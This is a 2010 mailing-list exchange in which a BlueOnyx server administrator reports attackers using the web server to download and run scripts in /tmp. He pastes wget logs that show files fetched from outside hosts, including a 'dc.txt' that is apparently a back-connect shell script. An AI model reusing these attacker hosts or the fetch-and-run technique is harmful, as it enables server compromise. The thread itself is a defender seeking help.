On Mon, 2010-11-29 at 11:23 -0600, Gerald Waugh wrote: > On Mon, 2010-11-29 at 17:17 +0000, Steve Howes wrote: > > On 29 Nov 2010, at 17:08, Gerald Waugh wrote: > > > How can I stop these people from downloading and running their scripts > > > in /tmp using httpd > > > > You need to find out how they did it. You're either hosting someone > > naughty, or someone who has an insecure script. Who owns the files? > > > apache.apache > > The server has a site with Drupal and some other blog stuff >
/tmp type ext3 (rw,noexec,nosuid) [Mon Nov 29 05:50:25 2010] [error] [client 208.80.194.26] File does not exist: /home/.sites/132/site96/web/trio.htm&h=300&w=305&sz=49&hl=en&start=526 --06:02:38-- http://193.136.136.86/quixplorer/readme.txt => `readme.txt' Connecting to 193.136.136.86:80... connected. HTTP request sent, awaiting response... 200 OK Length: 27,931 (27K) [text/plain] 0K .......... .......... ....... 100% 56.99 KB/s 06:02:39 (56.99 KB/s) - `readme.txt' saved [27931/27931] --06:02:39-- http://realezsites.com/pers/cowtipper524/dc.txt => `dc.txt' Resolving realezsites.com... 64.235.52.10 Connecting to realezsites.com|64.235.52.10|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 2,140 (2.1K) [text/plain] 0K .. 100% 2.40 MB/s 06:02:39 (2.40 MB/s) - `dc.txt' saved [2140/2140] -- Gerald _______________________________________________ Blueonyx mailing list [email protected] http://www.blueonyx.it/mailman/listinfo/blueonyx
